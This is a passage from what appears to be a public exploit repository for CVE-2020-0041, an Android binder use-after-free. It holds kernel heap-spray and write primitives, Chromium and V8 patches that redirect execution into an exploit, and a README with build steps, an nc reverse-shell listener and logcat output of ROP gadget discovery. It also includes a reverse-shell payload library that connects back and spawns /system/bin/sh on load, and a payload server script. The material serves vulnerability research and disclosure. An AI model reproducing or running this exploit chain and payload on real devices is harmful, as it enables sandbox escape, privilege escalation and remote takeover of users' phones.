| binder_write(bs, txn_data, sizeof(*t) + sizeof(uint32_t)); 224 | 225 | int res = 0; 226 | pthread_exit(&res); 227 | } 228 | 229 | /* 230 | * The endpoint calls into this function to setup a pending node. 231 | */ 232 | pthread_t add_pending_node(struct binder_state *from, uint64_t pending_node) 233 | { 234 | pthread_t th; 235 | 236 | struct pending_node *node = NULL; 237 | 238 | /* Create new pending_node */ 239 | node = pending_node_new(); 240 | if (!node) 241 | return NULL; 242 | 243 | node->bs = from; 244 | node->uaf_node = pending_node; 245 | 246 | if (pthread_create(&th, NULL, pending_node_thread, (void *)node)) { 247 | perror("pthread"); 248 | return (pthread_t)-1; 249 | } 250 | 251 | node->uaf_node_th = th; 252 | last_node_th = th; 253 | 254 | pthread_barrier_wait(&node->ready); 255 | 256 | return th; 257 | } 258 | 259 | 260 | /* 261 | * The endpoint calls into this function to 262 | * remove a specific pending node. 263 | */ 264 | void terminate_pending_node(pthread_t th) 265 | { 266 | /* Just unlock the barrier, and pthread_join */ 267 | struct pending_node *node = pending_node_get(th); 268 | if (!node) 269 | return ; 270 | 271 | 272 | pthread_barrier_wait(&node->ready); 273 | node->state = NODE_FINISHED; 274 | node->uaf_buffer = 0; 275 | pthread_barrier_wait(&node->do_barrier); 276 | pthread_barrier_wait(&node->done_barrier); 277 | pthread_join(node->uaf_node_th, NULL); 278 | 279 | /* Remove node. */ 280 | 281 | struct pending_node *tmp = pending_nodes; 282 | if (tmp == node) { 283 | pending_nodes = node->next; 284 | 285 | } else { 286 | while (tmp->next != node) 287 | tmp = tmp->next; 288 | 289 | tmp->next = node->next; 290 | } 291 | free(node); 292 | } 293 | 294 | 295 | /* 296 | * Perform a ADD_PENDING_NODE binder query, in order to ask the remote 297 | * endpoint to create a pending node transaction. 298 | */ 299 | pthread_t pending_node_create(struct binder_state *bs, uint64_t node) 300 | { 301 | uint64_t args[] = {bs, node}; 302 | pthread_t th; 303 | 304 | if (pthread_create(&th, NULL, pending_node_create_thread, (void *)args)) { 305 | perror("pthread create\n"); 306 | exit(0); 307 | } 308 | 309 | pthread_join(th, NULL); 310 | 311 | return last_node_th; 312 | } 313 | 314 | void pending_node_free(struct binder_state *bs, uint64_t node, uint64_t vma_start, uint32_t strong, uint32_t weak, bool second) 315 | { 316 | /* So we have our pending node in another thread. Now release our reference to uaf_node 317 | * and trigger the bug (3 times needs) to free the uaf_node, while the pending node thread keeps 318 | * a reference to it (as target_node) 319 | */ 320 | int i; 321 | for (i = 0; i < strong; i++) 322 | dec_node(bs, node, vma_start, true, second); 323 | 324 | for (i = 0; i < weak; i++) 325 | dec_node(bs, node, vma_start, false, second); 326 | } 327 | 328 | /* 329 | * Trigger a write8, by having the pending node thread 330 | * calling BC_FREE_BUFFER, which will enter the 331 | * `binder_dec_node()` function with (hopefully) controlled 332 | * `binder_node`, ultimately leading to a controlled 333 | * write8 334 | */ 335 | void pending_node_write8(pthread_t th) 336 | { 337 | struct pending_node *node = pending_node_get(th); 338 | if (!node) 339 | return ; 340 | /* Buffer release. */ 341 | 342 | pthread_barrier_wait(&node->ready); 343 | pthread_barrier_wait(&node->do_barrier); 344 | pthread_barrier_wait(&node->done_barrier); 345 | pthread_join(th, NULL); 346 | 347 | struct pending_node *tmp = pending_nodes; 348 | if (tmp == node) { 349 | pending_nodes = node->next; 350 | 351 | } else { 352 | while (tmp->next != node) 353 | tmp = tmp->next; 354 | 355 | tmp->next = node->next; 356 | } 357 | 358 | free(node); 359 | } 360 | 361 | /* 362 | * Kindly ask the endpoint to terminate a specific pending node thread. 363 | */ 364 | void pending_node_terminate(struct binder_state *bs, uint64_t handle, pthread_t th) 365 | { 366 | uint8_t txn_data[0x100]; 367 | uint8_t reply_data[0x100]; 368 | struct binder_io msg, reply; 369 | 370 | 371 | bio_init(&msg, txn_data, sizeof(txn_data), 10); 372 | bio_init(&reply, reply_data, sizeof(reply_data), 10); 373 | 374 | bio_put_uint32(&msg, (uint32_t)th); 375 | bio_put_uint32(&msg, (uint32_t)((uint64_t)(th)>>32)); 376 | binder_call(bs, &msg, &reply, handle, TERMINATE_PENDING_NODE); 377 | 378 | binder_free_buffer(bs, reply.data0); 379 | } 380 | 381 | /* 382 | * Leak the 2 qword of data from the UAFed pending node. 383 | * It has the side effect or terminating the pending_node_thread 384 | */ 385 | void pending_node_leak(pthread_t th, uint64_t *q1, uint64_t *q2) 386 | { 387 | struct pending_node *node = pending_node_get(th); 388 | if (!node) 389 | return; 390 | /* Okay spray epoll structures. */ 391 | pthread_barrier_wait(&node->ready); 392 | pthread_barrier_wait(&node->do_barrier); 393 | pthread_barrier_wait(&node->done_barrier); 394 | /* Inspecting node value. */ 395 | 396 | if (q1) 397 | *q1 = node->leaked_data[0]; 398 | if (q2) 399 | *q2 = node->leaked_data[1]; 400 | } 401 | -------------------------------------------------------------------------------- /lpe/src/realloc.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | 15 | #include "realloc.h" 16 | #include "log.h" 17 | #include "helpers.h" 18 | 19 | struct realloc_thread { 20 | void *stack; 21 | pid_t pid; 22 | pthread_t th; 23 | bool evicted; 24 | size_t size; 25 | int cpu; 26 | int pair[2]; 27 | int ctrl[2]; 28 | pthread_barrier_t barrier; 29 | }; 30 | 31 | uint8_t realloc_buffer[BUFSZ]; 32 | 33 | volatile struct realloc_thread threads[NREALLOC]; 34 | 35 | 36 | pthread_barrier_t realloc_barrier; 37 | 38 | /* 39 | * This thread is in charge of reallocating the freed binder_node 40 | * with controlled data. 41 | */ 42 | void *realloc_thread(void *args) 43 | { 44 | 45 | uint8_t buffer[BUFSZ + 1]; 46 | struct realloc_thread *thread = (struct realloc_thread *)args; 47 | size_t size = thread->size; 48 | int cpu = thread->cpu; 49 | struct msghdr msg; 50 | struct iovec iov; 51 | memset(&iov, 0, sizeof(iov)); 52 | memset(&msg, 0, sizeof(msg)); 53 | 54 | pin_cpu(cpu); 55 | 56 | uint32_t pid = syscall(__NR_gettid); 57 | /* Exhaust the available socket window. */ 58 | iov.iov_base = realloc_buffer; 59 | iov.iov_len = size; 60 | msg.msg_iov = &iov; 61 | msg.msg_iovlen = 1; 62 | 63 | while (sendmsg(thread->pair[0], &msg, MSG_DONTWAIT) > 0); 64 | 65 | /* The next call will block. */ 66 | msg.msg_control = realloc_buffer; 67 | msg.msg_controllen = size; 68 | 69 | /* Signal we have finished spawning. */ 70 | 71 | thread->evicted = false; 72 | while (!thread->evicted) { 73 | 74 | //pthread_barrier_wait(&realloc_barrier); 75 | /* We're waiting here for the signal to copy the buffer data. */ 76 | pthread_barrier_wait(&thread->barrier); 77 | 78 | 79 | memcpy(buffer, realloc_buffer, size); 80 | *(uint64_t *)(buffer + 0x60) = pid; 81 | msg.msg_control = buffer; 82 | msg.msg_controllen = size; 83 | 84 | //pthread_barrier_wait(&realloc_barrier); 85 | /* We're waiting for the signal to block on the sendmsg syscall, and kmalloc() our 86 | * controlled data. 87 | */ 88 | pthread_barrier_wait(&thread->barrier); 89 | syscall(__NR_sendmsg, thread->pair[0], &msg, 0); 90 | 91 | 92 | pthread_barrier_wait(&thread->barrier); 93 | 94 | /* And fill the socket queue once again. */ 95 | while (sendmsg(thread->pair[0], &msg, MSG_DONTWAIT) > 0); 96 | } 97 | 98 | /* Wait for the exit signal. */ 99 | 100 | pthread_barrier_wait(&thread->barrier); 101 | 102 | return NULL; 103 | } 104 | 105 | /* 106 | * Wait on the barrier, which will ultimately make the threads enter the 107 | * `sendmsg()` syscall and allocate controlled data. 108 | */ 109 | void realloc_barrier_wait(void) 110 | { 111 | int i; 112 | 113 | for (i = 0; i < NREALLOC; i++) { 114 | if (threads[i].evicted) 115 | continue; 116 | pthread_barrier_wait(&threads[i].barrier); 117 | } 118 | } 119 | 120 | /* 121 | * Spawn all the threads used during the reallocation. 122 | */ 123 | void spawn_realloc_threads() 124 | { 125 | memset(realloc_buffer, 'A', BUFSZ); 126 | *(uint32_t *)realloc_buffer = BUFSZ; 127 | *(uint32_t *)(realloc_buffer + 4) = 0; // set node->lock 128 | 129 | if (pthread_barrier_init(&realloc_barrier, NULL, NREALLOC + 1) < 0) { 130 | perror("pthread_barrier_init"); 131 | exit(1); 132 | } 133 | 134 | int i; 135 | int ncpus = sysconf(_SC_NPROCESSORS_ONLN); 136 | for (i = 0; i < NREALLOC; i++) { 137 | pid_t pid; 138 | void *stack = malloc(0x10000); 139 | threads[i].evicted = false; 140 | threads[i].size = BUFSZ; 141 | threads[i].cpu = i % ncpus; 142 | threads[i].stack = stack; 143 | 144 | if (pthread_barrier_init(&threads[i].barrier, NULL, 2) < 0) { 145 | log_err("[-] pthread_barrier_init: '%s'\n", strerror(errno)); 146 | exit(1); 147 | } 148 | 149 | /* Create a socketpair. */ 150 | if (socketpair(AF_LOCAL, SOCK_DGRAM, 0, threads[i].pair) < 0) { 151 | perror("socketpair"); 152 | pthread_exit(NULL); 153 | } 154 | 155 | pid = clone(realloc_thread, stack + 0x10000 - 8, CLONE_VM|CLONE_FILES|SIGCHLD, &threads[i]); 156 | if (pid < 0) { 157 | perror("clone"); 158 | exit(1); 159 | } 160 | 161 | threads[i].pid = pid; 162 | 163 | } 164 | } 165 | 166 | /* 167 | * Setup the content of the buffer, whose content will be sprayed in kernel during the 168 | * `sendmsg()` call. 169 | */ 170 | void setup_realloc_buffer(void *content, size_t size) 171 | { 172 | if (size <= 8) 173 | return; 174 | 175 | if (size > BUFSZ) 176 | size = BUFSZ; 177 | 178 | /* We need to skip the first 8 bytes, because otherwise, sendmsg will fail. */ 179 | memcpy(realloc_buffer + 8, content + 8, size - 8); 180 | /* Unlock the realloc thread, let them copy the buffer. */ 181 | realloc_barrier_wait(); 182 | } 183 | 184 | /* 185 | * Discard a thread from the pool. We do this when we successfully replaced a `binder_node` with controlled 186 | * content, and this `binder_node` is subsequently used to trigger a write8, as the side effect of this is 187 | * to free (once again) the `binder_node`. As the realoc thread will keep a reference to the `binder_node` and 188 | * free it as well, we keep it blocking on `sendmsg()` for now, until we can clean that reference from the kernel 189 | * stack later on. 190 | */ 191 | bool discard_realloc_thread(pid_t pid) 192 | { 193 | int i; 194 | 195 | for (i = 0; i < NREALLOC; i++) { 196 | if (threads[i].pid == pid) { 197 | threads[i].evicted = true; 198 | return true; 199 | } 200 | } 201 | 202 | return false; 203 | } 204 | 205 | /* 206 | * Make the threads exit their blocking `sendmsg()` call, and brace themselves before 207 | * being use once again to allocate controlled data in kernel land. 208 | */ 209 | void reset_realloc_threads() 210 | { 211 | int i; 212 | uint8_t buf[0x1000]; 213 | 214 | for (i = 0; i < NREALLOC; i++) { 215 | if (threads[i].evicted) 216 | continue; 217 | while (recv(threads[i].pair[1], buf, 0x1000, MSG_DONTWAIT) > 0); 218 | pthread_barrier_wait(&threads[i].barrier); 219 | } 220 | } 221 | 222 | /* 223 | * We're done, kill the whole thread pool. 224 | */ 225 | void cleanup_realloc_threads() 226 | { 227 | int i; 228 | /* Kill realloc threads. */ 229 | for (i = 0; i < NREALLOC; i++) { 230 | int status; 231 | if (threads[i].evicted){ 232 | continue; 233 | } 234 | kill(threads[i].pid, SIGKILL); 235 | close(threads[i].pair[0]); 236 | close(threads[i].pair[1]); 237 | 238 | //pthread_barrier_wait(&threads[i].barrier); 239 | } 240 | int status; 241 | for (i = 0; i < NREALLOC; i++) { 242 | if (threads[i].evicted) 243 | continue; 244 | waitpid(threads[i].pid, &status, 0); 245 | //pthread_join(threads[i].th, NULL); 246 | threads[i].pid = 0; 247 | free(threads[i].stack); 248 | threads[i].stack = 0; 249 | } 250 | } 251 | 252 | 253 | 254 | -------------------------------------------------------------------------------- /sandbox/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2020-0041: Chrome sandbox escape exploit 2 | 3 | This folder contains the Chrome sandbox escape exploit we wrote for CVE-2020-0041. 4 | The exploit is provided as a set of patches for Chromium 78.0.3904.62 in order to 5 | demonstrate the approach. 6 | 7 | The same code could be simply injected into the renderer from an RCE vulnerability 8 | or using a rooted phone for test pruposes. 9 | 10 | ## Testing the exploit 11 | 12 | 13 | ### Building chrome 14 | 15 | The exploit is provided as a set of patches for a checkout of the `78.0.3904.62` 16 | release branch. 17 | 18 | To test the exploit, first checkout and build the provided branch for Android. 19 | The exploit was built against a build using the following arguments: 20 | 21 | ``` 22 | target_os = "android" 23 | target_cpu = "arm" 24 | is_debug = false 25 | is_official_build=true 26 | ``` 27 | 28 | After the initial build succeeds, apply the changes in `sandbox/v8.diff` to the 29 | `v8` code, and the changes in `main.diff` to the main repository: 30 | 31 | ``` 32 | user@laptop:~/work/chromium_release/chromium/src$ patch -p1 < ~/num_valid/sandbox/main.diff 33 | patching file content/renderer/binder.c 34 | patching file content/renderer/binder.h 35 | patching file content/renderer/binder_lookup.h 36 | patching file content/renderer/constants.h 37 | patching file content/renderer/exploit.c 38 | patching file content/renderer/render_thread_impl.cc 39 | patching file content/renderer/rop.h 40 | patching file content/renderer/sc.h 41 | patching file content/renderer/uapi_binder.h 42 | 43 | user@laptop:~/chromium/src$ cd v8 44 | user@laptop:~/chromium/src/v8$ patch -p1 < ~/num_valid/sandbox/v8.diff 45 | patching file src/builtins/builtins-typed-array.cc 46 | ``` 47 | 48 | The patches create a hook in the `indexOf` function of typed array buffers, 49 | which when called with 3 or more arguments redirect execution into the `exploit` 50 | function in `content/renderer/exploit.c`. 51 | 52 | After the patches have been applied, rebuild Chromium and install the produced 53 | APK. 54 | 55 | ``` 56 | user@laptop:~/work/chromium_release/chromium/src$ ninja -C out/Default chrome_public_apk -j 8 && \ 57 | out/Default/bin/chrome_public_apk uninstall && out/Default/bin/chrome_public_apk install 58 | ``` 59 | 60 | ### Testing the exploit 61 | 62 | After building the patched chromium and installing it on a phone, the following 63 | setup is required: 64 | 65 | 1. Build the library you would like to payload and run the `serve.py` script from the `sandbox/` folder. 66 | This script will provide the `payload.so` file to be loaded by the shellcode. Additionally, 67 | it also serves the `payload.dex` and `payload.exe` file if the `payload.so` file requests 68 | them (used for the LPE exploit): 69 | 70 | ``` 71 | $ cd reverse_shell && make && cp libs/armeabi-v7a/libpayload.so ../payload.so && cd .. 72 | $ adb reverse tcp:6666 tcp:6666 ; python ./serve.py 73 | ``` 74 | 75 | 2. Setup a reverse shell listener on tcp:5555: 76 | 77 | ``` 78 | $ adb reverse tcp:5555 tcp:5555 ; nc -l -p 5555 -vv 79 | ``` 80 | 81 | 3. Serve `sandbox/index.html` to the browser to trigger the exploit. For example, 82 | using python: 83 | 84 | ``` 85 | $ adb reverse tcp:8080 tcp:8080 ; python -m SimpleHTTPServer 8080 86 | ``` 87 | 88 | Now simply navigate to http://localhost:8080/ to trigger the exploit. 89 | 90 | ``` 91 | $ adb reverse tcp:5555 tcp:5555 ; nc -l -p 5555 -vv 92 | 5555 93 | Listening on [0.0.0.0] (family 0, port 5555) 94 | Connection from localhost 36871 received! 95 | id 96 | uid=10246(u0_a246) gid=10246(u0_a246) groups=10246(u0_a246),3001(net_bt_admin),3002(net_bt),3003(inet),9997(everybody),20246(u0_a246_cache),50246(all_a246) context=u:r:untrusted_app_27:s0:c246,c256,c512,c768 97 | 98 | ``` 99 | 100 | The exploit also produces debug output in logcat with the PWN tag. To see it, 101 | simply run `adb logcat | grep PWN`. It should produce output similar to this: 102 | 103 | ``` 104 | 11-04 16:33:08.269 31606 31634 D PWN : [*] Binder mapping at 0xc97eb000 105 | 11-04 16:33:08.269 31606 31634 D PWN : [*] Found binder fd 9 106 | 11-04 16:33:08.272 31606 31634 D PWN : [*] IParentProcess handle is 5 107 | 11-04 16:33:08.275 31606 31634 D PWN : [*] Transaction size max fdeb8 108 | 11-04 16:33:08.275 31606 31634 D PWN : [*] Target user_address: c97eb148 109 | 11-04 16:33:08.276 31606 31634 D PWN : [*] Target binder offset: 64 110 | 11-04 16:33:08.276 31606 31634 D PWN : [*] Fake PTR offset: 7c 111 | 11-04 16:33:08.276 31606 31634 D PWN : [*] Valid PTR offset: a4 112 | 11-04 16:33:08.276 31606 31634 D PWN : [*] Shellcode size: 0x160 113 | 11-04 16:33:08.286 31606 31634 D PWN : [*] libc: 0xf1585000 , libc size: 0xb6000 114 | 11-04 16:33:08.289 31606 31634 D PWN : [*] Found gadget 0 at 0xf163024c 115 | 11-04 16:33:08.290 31606 31634 D PWN : [*] Found gadget 1 at 0xf15dfcdc 116 | 11-04 16:33:08.291 31606 31634 D PWN : [*] Found gadget 2 at 0xf15ce0a9 117 | 11-04 16:33:08.292 31606 31634 D PWN : [*] Found gadget 3 at 0xf15e8c6f 118 | 11-04 16:33:08.293 31606 31634 D PWN : [*] Found gadget 4 at 0xf15ee10d 119 | 11-04 16:33:08.293 31606 31634 D PWN : [*] Found gadget 5 at 0xf15ae24d 120 | 11-04 16:33:08.295 31606 31634 D PWN : [*] Found gadget 6 at 0xf160ebfc 121 | 11-04 16:33:08.297 31606 31634 D PWN : [*] Found gadget 7 at 0xf1619335 122 | 11-04 16:33:08.297 31606 31634 D PWN : [*] Found gadget 8 at 0xf15d38df 123 | 11-04 16:33:08.298 31606 31634 D PWN : [*] Found gadget 9 at 0xf15bb2b8 124 | 11-04 16:33:08.299 31606 31634 D PWN : [*] Found gadget 10 at 0xf15e4774 125 | 11-04 16:33:08.300 31606 31634 D PWN : [*] Found gadget 11 at 0xf15dfbb8 126 | 11-04 16:33:08.302 31606 31634 D PWN : [*] Handle: 0xec965cd8, open: 0xf15eb281 127 | 11-04 16:33:08.311 31606 31634 D PWN : [*] Linker mapping at 0xf39d6000, size b9000 128 | 11-04 16:33:08.311 31606 31634 D PWN : [*] Found linker dlopen: 0xf39f30b9 129 | 11-04 16:33:08.311 31606 31634 D PWN : [*] fake_object_addr: c97eb2e8 130 | 11-04 16:33:08.311 31606 31634 D PWN : [*] Register scratch space: f163b6e8 131 | 11-04 16:33:08.311 31606 31634 D PWN : [*] Final shellcode expected at c97eb658 132 | 11-04 16:33:08.311 31606 31634 D PWN : [*] Final shellcode location 30309000 133 | 11-04 16:33:08.311 31606 31634 D PWN : [*] Shellcode copy at 30308800 134 | 11-04 16:33:08.337 31606 31634 D PWN : [*] transaction return code: 0 135 | 136 | ``` 137 | -------------------------------------------------------------------------------- /sandbox/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 18 | 19 | 20 | 21 | 22 | 23 | Test. 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /sandbox/reverse_shell/Android.mk: -------------------------------------------------------------------------------- 1 | LOCAL_PATH := $(call my-dir) 2 | include $(CLEAR_VARS) 3 | LOCAL_MODULE := payload 4 | LOCAL_CFLAGS += -Iinclude 5 | LOCAL_SRC_FILES := src/reverse_shell.c 6 | 7 | #include $(BUILD_EXECUTABLE) 8 | include $(BUILD_SHARED_LIBRARY) 9 | 10 | 11 | -------------------------------------------------------------------------------- /sandbox/reverse_shell/Application.mk: -------------------------------------------------------------------------------- 1 | APP_ABI := armeabi-v7a 2 | APP_PLATFORM := android-24 3 | APP_BUILD_SCRIPT := Android.mk 4 | 5 | -------------------------------------------------------------------------------- /sandbox/reverse_shell/Makefile: -------------------------------------------------------------------------------- 1 | # Assume nkd-build is in the path 2 | NDK_BUILD := NDK_PROJECT_PATH=. ndk-build NDK_APPLICATION_MK=./Application.mk 3 | # Retrieve binary name from Android.mk 4 | BIN := $(shell cat Android.mk | grep LOCAL_MODULE | head -n1 | cut -d' ' -f3) 5 | 6 | #BIN_PATH := libs/armeabi-v7a/$(BIN) 7 | BIN_PATH := libs/armeabi-v7a/lib$(BIN).so 8 | 9 | all: android 10 | 11 | $(BIN_PATH): 12 | $(NDK_BUILD) 13 | 14 | android: 15 | @echo "Building Android" 16 | $(NDK_BUILD) 17 | 18 | push: $(BIN_PATH) $(LOADER) 19 | adb push $(BIN_PATH) /data/local/tmp/$(notdir $(BIN_PATH)) 20 | 21 | shell: push 22 | adb shell /data/local/tmp/$(BIN) 23 | 24 | clean: 25 | $(NDK_BUILD) clean 26 | -adb shell rm /data/local/tmp/$(notdir $(BIN_PATH)) 27 | 28 | distclean: clean 29 | $(RM) -rf libs obj 30 | -------------------------------------------------------------------------------- /sandbox/reverse_shell/src/reverse_shell.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #include 8 | 9 | 10 | void reverse_shell(char *ip, int port){ 11 | 12 | /* fork twice here */ 13 | 14 | int pid = fork(); 15 | 16 | if (pid != 0) 17 | return; 18 | 19 | pid = fork(); 20 | if (pid != 0) 21 | return; 22 | 23 | struct sockaddr_in sa; 24 | int s; 25 | 26 | sa.sin_family = AF_INET; 27 | sa.sin_addr.s_addr = inet_addr(ip); 28 | sa.sin_port = htons(port); 29 | 30 | s = socket(AF_INET, SOCK_STREAM, 0); 31 | connect(s, (struct sockaddr *)&sa, sizeof(sa)); 32 | 33 | dup2(s, 0); 34 | dup2(s, 1); 35 | dup2(s, 2); 36 | 37 | execve("/system/bin/sh", 0, 0); 38 | 39 | } 40 | 41 | 42 | int __attribute__((constructor)) main(void) 43 | { 44 | 45 | reverse_shell("127.0.0.1", 5555); 46 | } -------------------------------------------------------------------------------- /sandbox/serve.py: -------------------------------------------------------------------------------- 1 | import SocketServer 2 | import struct 3 | 4 | def p32(x): 5 | return struct.pack(" 3) { 20 | + 21 | + 22 | + uint8_t* buffer = static_cast(array->DataPtr()); 23 | + size_t element_size = array->element_size(); 24 | + size_t size = array->length() * element_size; 25 | + 26 | + if (pwn_hook) 27 | + return Smi::FromInt(pwn_hook(buffer, size)); 28 | + 29 | + return Smi::FromInt(1337); 30 | + 31 | + } 32 | + 33 | if (args.length() > 2) { 34 | Handle num; 35 | ASSIGN_RETURN_FAILURE_ON_EXCEPTION( 36 | --------------------------------------------------------------------------------